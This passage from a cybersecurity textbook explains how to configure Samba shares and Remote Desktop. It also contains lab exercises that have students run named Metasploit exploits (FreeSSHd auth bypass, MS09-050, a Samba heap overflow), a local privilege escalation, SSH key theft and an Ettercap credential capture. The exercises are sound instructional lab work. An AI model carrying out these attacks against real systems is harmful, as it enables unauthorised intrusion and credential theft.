This indicates that Samba should create a separate log for each client; the variable %m expands to the client’s NetBIOS name. Other reasonable variables include %M for the client’s DNS name, and %I for the client’s IP address.The degree of detail in the log is governed by Samba’s loglevel, which ranges from 0 to 10; higher levels record more detail in the logs. Levels of 3 an above are used primarily by developers for debugging and can slow Samba down.

Samba can also use syslog for messages; the sample configuration file uses the directive

syslog = 1

· This sends messages of Samba log level less than 1 to syslog. Samba log levels are mapped to syslog priority levels as follows. Samba log level 0 ➤ Syslog priority error

· Samba log level 1 ➤ Syslog priority warning

· Samba log level 2 ➤ Syslog priority notice

· Samba log level 3 ➤ Syslog priority info

· Samba log level 4 and above ➤ Syslog priority debug

To configure a common share available to all authenticated users, first create the directory and set the permissions.

nabel@ring ∼ $ sudo mkdir -p /srv/samba/CommonShare

nabel@ring ∼ $ sudo chmod 777 /srv/samba/CommonShare/

As was the case on Windows Server, the actual shared directory can be located anywhere in the file system.

The label [CommonShare] in the sample configuration is the name of the shared directory that is presented to clients. The value in the comment directive is presented to users that query the server for more information about the share and can be seen for example in the result of a smbclient command:

jhadamard@Cone ∼ $ smbclient -L ring -U nabel

Enter nabel’s password:

Domain=[SCIENCE] OS=[Unix] Server=[Samba 3.6.18]

Sharename Type Comment

--------- ---- -------

CommonShare Disk Common File Share for Authenticated Users

IPC$ IPC IPC Service (Samba Server Version 3.6.18)

nabel Disk Home Directories

Domain=[SCIENCE] OS=[Unix] Server=[Samba 3.6.18]

Server Comment

--------- -------

RING Samba Server Version 3.6.18

Workgroup Master

--------- -------


The remaining settings in the CommonShare section are self-explanatory; the path is the location in the file system that is shared. Setting browseable to yes lets users see the share in, for example, network places on a Windows system. Anonymous users are prevented from accessing the share, and users are allowed to write to the directory.

The label [homes] is special, and shares each user’s home directory. The valid users flag is set to %S, which expands to the name of the current share; this ensures that only the user whose directory is being shared has access to the share.

When changes are made to a Samba configuration file, it can be checked for accuracy via the testparm command.

nabel@ring ∼ $ testparm

Load smb config files from /etc/samba/smb.conf

rlimit_max: increasing rlimit_max (1024) to minimum Windows limit (16384)

Processing section "[CommonShare]"

Processing section "[homes]"

Loaded services file OK.


Press enter to see a dump of your service definitions


workgroup = SCIENCE

server string = Samba Server Version %v

log file = /var/log/samba/log.%m

idmap config * : backend = tdb


comment = Common File Share for Authenticated Users

path = /srv/samba/CommonShare

read only = No

create mask = 0755


comment = Home Directories

valid users = %S

read only = No

browseable = No

Once the configuration is complete, start (or restart) the service; Samba is now serving files.

Before a user can access either the common share or their shared home directory, a Samba user must be created and provided with a password; this is done via

nabel@ring ∼ $ sudo smbpasswd -a nabel

New SMB password:

Retype new SMB password:

The password provided for the user does not have to match their Linux login password. Users on Windows or Linux can access the shared folders in the same way as file shares provided by Windows Server.

Remote Desktop

Remote Desktop is a way a remote user can access a Windows system and be presented with the full graphical interface. To enable Remote Desktop for systems on a domain, two settings need to be made in Group Policy. From the Group Policy Management Editor, update

· Computer Configuration ➤ Policies ➤ Administrative Templates ➤ Windows Components ➤ Remote Desktop Services ➤ Remote Desktop Session Host ➤ Connections ➤ Allow users to connect remotely by using Remote Desktop Services, and change the setting to Enabled. This ensures Remote Desktop Services run on the system(s).

· Computer Configuration ➤ Policies ➤ Administrative Templates ➤ Network ➤ Network Connections ➤ Windows Firewall ➤ Domain Profile ➤ Windows Firewall: Allow inbound Remote Desktop exceptions, and change the setting to enabled. This opens the necessary ports in the firewall (TCP/3389, UDP/3389).

These settings allow administrators the ability to log in via Remote Desktop. To grant that privilege to other users, they must be added to the Remote Desktop Users group; this group is local to each system. To do so, one approach is to use group policy to override the members of the local group. From Group Policy Management Editor, update

· Computer Configuration ➤ Policies ➤ Windows Settings ➤ System Settings ➤ Restricted Groups. Add a group, named Remote Desktop Users. Add any non-administrator users as members of the group. Be sure to include the domain name when specifying the username, so for the user fpregl on the CORP domain, specify CORP\fpregl.

Once configured, users can connect to a remote system using Remote Desktop Connection (Figure 9-20), which can be launched from Start ➤ All Programs ➤ Accessories ➤ Remote Desktop Connections, or directly from C:\Windows\System32\mstsc.exe


Figure 9-20.

The Remote Desktop Connection Client on Windows 8


Specify the full name of the computer (NetBIOS names do not always work), then authenticate. After connecting, the user is presented with a full graphical user interface on the server.

There are comparable Linux clients. Remmina is available for recent versions of Ubuntu and OpenSuSE and behaves similarly. An older command-line client available for most distributions is rdesktop. As an example, consider the command

[ilangmuir@tethys ∼]$ rdesktop enceladus.corp.saturn.test

This presents the user with a login screen for the system enceladus.corp.saturn.test.

The rdesktop tool is unable to connect to a remote desktop server running on Windows 8 without additional configuration. By default, these systems enable network level authentication that prevents certain clients from being able to authenticate. This can be disabled in group policy; navigate Computer Configuration ➤ Policies ➤ Administrative Templates ➤ Windows Components ➤ Remote Desktop Services ➤ Remote Desktop Session Host ➤ Security, and change the value of the setting Require user authentication for remote connections by using Network Level Authentication to disabled.

It is possible to enable Remote Desktop on a single client rather than on a domain. Navigate Control Panel ➤ System and Security ➤ System. Select Remote Settings, and make the desired changes (Figure 9-21). This not only enables the service, but also opens the proper ports in the Firewall (TCP/3389, UDP/3389).


Figure 9-21.

Enabling Remote Desktop on Windows 7



FreeSSHd is an older SSH server available for Windows from . Install it on a Windows system, and configure it.3 Verify that the installation works by connecting to the SSH server from a remote Linux host.4 FreeSSHd 1.2.6 is vulnerable to an exploit that bypasses authentication; all that is necessary is a valid account name (CVE 2012-6066). Run the Metasploit module exploit/windows/ssh/freesshd_authbypass against the Windows system and gain a shell.


Use ssh-keygen to regenerate the DSA and ECDSA keys on an OpenSSH server.


It is possible to use Cygwin to run OpenSSH server on a Windows system. Download Cygwin from . Run the setup tool and install the OpenSSH server (Figure 9-22). Once the server is installed, launch the Cygwin terminal (as administrator) and run the script ssh-host-config to setup and configure OpenSSH. Start the server, and verify it works by connecting to it from a remote system. Be sure to open the proper port in the firewall.


Figure 9-22.

Using the Cygwin Setup Program to Install OpenSSH server on Windows 7


Construct two Linux systems with system A running an OpenSSH server. On system B, create a key pair, and copy the public key to system A so that a user on B can login to A. Use the techniques of Chapter 2 to exploit system B. If the key is not protected by a passphrase, have the attacker download the key to the attacker’s system and use it to log in to A. If the key is protected by a passphrase and the passphrase has been loaded into an agent, show that the attacker can log into A from B using the key provided by the agent.5


One defense against brute force attacks against an SSH server is to configure the authentication system to temporarily lock out an account after a set number of failed login attempts. Investigate the PAM module pam_tally2, and configure a Linux target to lock accounts after five failed login attempts. What are the advantages and disadvantages of applying this policy to the root account?


Run an NMap scan against a host running SSH. What appears in the logs for SSH? Does the result change if version detection is enabled in the scan? Does the result change is default and safe scripts are included in the scan?


Write a Python script that opens the appropriate Linux log file and counts the number of failed login attempts that occur each day.


The presence of an OpenSSH server and an appropriate public/private key pair for SSH allows a local privilege escalation attack on Ubuntu 9.10/10.04/10.10 and Mint 8,9,10. The underlying vulnerability is CVE 2010-0832, and exploit code is available online at or on a Kali system at /usr/share/exploitdb/platforms/linux/local/ Verify the exploit works. [In some cases, the script may need modification before it runs cleanly.] Verify that the exploit leaves detectable traces in the logs. What changes if any does the exploit make to /etc/passwd? Verify your claims.


Configure an FTP server that requires authentication. Use Ettercap to start a man in the middle attack between the client and the server. Verify that Ettercap captures both the plain text user name and password.


One older attack against Windows Server 2008 (not R2) is the MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference attack available in Metasploit as the module exploit/windows/smb/ms09_050_smb2_negotiate_func_index. Attempt the attack. The attack actually can be made against any Windows Server 2008 (or Vista) system that exposes the proper ports. If the system acts as a file server, then the Firewall allows connections to TCP/135 TCP/139 TCP/445.


The Metasploit exploit Samba SetInformationPolicy AuditEventsInfo Heap Overflow in the module exploit/linux/samba/setinfopolicy_heap can exploit Samba servers running on Ubuntu 10.10, 11.04, and 11.10. How reliable is the exploit? What information is available in the logs after the attack? Examine /var/log/syslog and /var/log/samba.

Notes and References

Linux systems use runlevels to determine what services should be started after the system is booted. These levels have different meanings, depending on the distribution (Table 9-3).

Table 9-3.

Default Runlevels, by Linux Distribution










Single User

Single User

Single User


Multi-user, no networking

Multi-user, graphics



Multi-user, text only

Multi-user, text only



Multi-user, graphics (default)

Multi-user, graphics






On CentOS and OpenSuSE systems, the default runlevel is 5, while on Ubuntu and Mint systems the default runlevel is 2. The runlevel is a parameter set during system boot; some boot managers (e.g., GRUB) allow the runlevel to be manually modified before the system boots. The init command can be used on a system to change the current runlevel; for example, to reboot the system issue the command

[root@Spica ∼]# init 6

OpenSSH Server

An excellent book on OpenSSH is

· SSH Mastery: OpenSSH, PuTTY, Tunnels and Keys, Michael W. Lucas. Tilted Windmill Press, January 2012.

Table 9-4.

Default included version of OpenSSH, by Linux distribution





































































































Recommendations for SSH key management have been provided by NIST, in NIST Special Publication 800-57, available at (released July 2012). NIST also has the draft document NISTIR 7966, Security of Automated Access Management Using Secure Shell (SSH) available at (released August 2014) to provide recommendations for securing SSH.

A problem can arise during the installation of OpenSSH server on older versions of Mint (such as Mint 5). The openssh-server package depends on openssh-client; and depending on how the original system was installed, the version of openssh-client already present on the system is not compatible with the version of openssh-server. To solve the problem, use dpkg -r to remove both openssh-client and ssh-askpass-gnome; then use apt-get to install openssh-server; this reinstalls the older (compatible) version of openssh-client.

OpenSuSE 12.1 does not appear to generate the OpenSSH DSA key by default, even though it is listed in the configuration file /etc/ssh/sshd_config. When OpenSSH is started, the log contains entries of the form

Oct 25 12:43:28 localhost sshd[24308]: error: Could not load host key: /etc/ssh/ssh_host_dsa_key

A key can be generated with openssl.

SSHGuard is not the only option to protect SSH servers from brute force attacks. Another choice is fail2ban (

FTP Servers

Documentation for vsftpd, including a list of the directives in vsftpd.conf, can be obtained from the project page at .

Table 9-5.

Default included version of vsftpd, by Linux distribution





































































































There is a significant bug in the default installation for vsftpd on OpenSuSE 12.3; the server dies when users attempt to download a file. See . The solution is to use an updated version of vsftpd.

The firewall configuration for OpenSuSE 11.0 does not allow passive mode FTP; see also .

Although the service command provides an interface to the underlying systemd process for OpenSSH on OpenSuSE 13.1, it does not for vsftpd. Instead, the native systemd tools are needed. For example to determine the status of the server on OpenSuSE 13.1, run the command

mirach:∼ # systemctl status vsftpd

vsftpd.service - Vsftpd ftp daemon

Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; disabled)

Active: active (running) since Fri 2014-11-07 22:52:20 EST; 1min 46s ago

Main PID: 2229 (vsftpd)

CGroup: /system.slice/vsftpd.service

└─2229 /usr/sbin/vsftpd /etc/vsftpd.conf

Nov 07 22:52:20 mirach systemd[1]: Starting Vsftpd ftp daemon...

Nov 07 22:52:20 mirach systemd[1]: Started Vsftpd ftp daemon.

Windows File Shares

Two good general references that cover file shares on Windows Server include

· Windows Server 2012 Inside Out, William Stanek. Microsoft Press, January 2013.

· Mastering Windows Server 2012 R2, Mark Minasi, Kevin Greene, Christian Booth, Robert Butler, John McCabe, Robert Panek, Michael Rice, and Stefan Roth. Sybex, December 2013.

For good coverage of Samba 3, there are two free books from the Samba project

· The Official Samba 3.2.x HOWTO and Reference Guide, Jelmer R. Vernooij, John H. Terpstra, and Gerald (Jerry) Carter. May 27, 2009. Available online at .

· Samba-3 by Example: Practical Exercises in Successful Samba Deployment, John H. Terpstra. May 27, 2009. Available online at .

For documentation about particular Samba components, there is a description of the Samba configuration directives at while a list of the variables is at .

An older book that discusses the problem of how to get Windows and Linux to interoperate is

· Windows and Linux Integration: Hands-on Solutions for a Mixed Environment, Jeremy Moskowitz and Thomas Boutell. Sybex, September 2005.

Table 9-6.

Default included version of Samba, by Linux distribution





































































































There is a bug in the default configuration for Samba on OpenSuSE 11.4. Attempts to start the smb service fail, with log messages of the form

Nov 2 20:11:51 diphda smbd[2919]: [2014/11/02 20:11:51.011041, 0] passdb/secrets.c:73(secrets_init)

Nov 2 20:11:51 diphda smbd[2919]: Failed to open /etc/samba/secrets.tdb

Nov 2 20:11:51 diphda smbd[2921]: [2014/11/02 20:11:51.012018, 0] passdb/secrets.c:73(secrets_init)

Nov 2 20:11:51 diphda smbd[2921]: Failed to open /etc/samba/secrets.tdb

Nov 2 20:11:51 diphda smbd[2921]: [2014/11/02 20:11:51.012070, 0] smbd/server.c:1234(main)

Nov 2 20:11:51 diphda smbd[2921]: ERROR: smbd can not open secrets.tdb

The underlying flaw is a misconfiguration in AppArmor. The file /etc/apparmor.d/abstractions/samba configures AppArmor to allow samba to open .tdb files located in /var/lib/samba. The catch is that they actually are located in /etc/samba. Update that file with the error fix

File 9-5. Modified portion of the file /etc/apparmor.d/abstractions/samba from OpenSuSE 11.4

/etc/samba/smb.conf r,

/usr/share/samba/*.dat r,

/var/lib/samba/**.tdb rwk,

/etc/samba/**.tdb rwk, # Error Fix

/var/log/samba/cores/* w,

/var/log/samba/log.* w,

/var/run/samba/*.tdb rw,

Restart AppArmor with the command

diphda:∼ # rcapparmor reload

Subsequent attempts to start the samba service will succeed.



See the Notes and References for more information about system runlevels.


To change this behavior, modify the preferred SSH protocol version setting available in PuTTY by navigating Connection ➤ SSH.


I have had much better luck with this program if it is not set to run as a service.


If you connect to the FreeSSHd using a Linux SSH client, it may assume that you are at the top of the screen but does not clear the screen. You may be staring at the bottom of the screen waiting for a response, when it has already authenticated you and moved your cursor to the top of the screen.


Some of the shells provided by Metasploit may make interacting with the SSH client difficult. Some of the techniques of Chapter 7, such as using Perl to create a second, more stable shell, may prove helpful.

© Mike O'Leary 2015

Mike O'LearyCyber Operations10.1007/978-1-4842-0457-3_10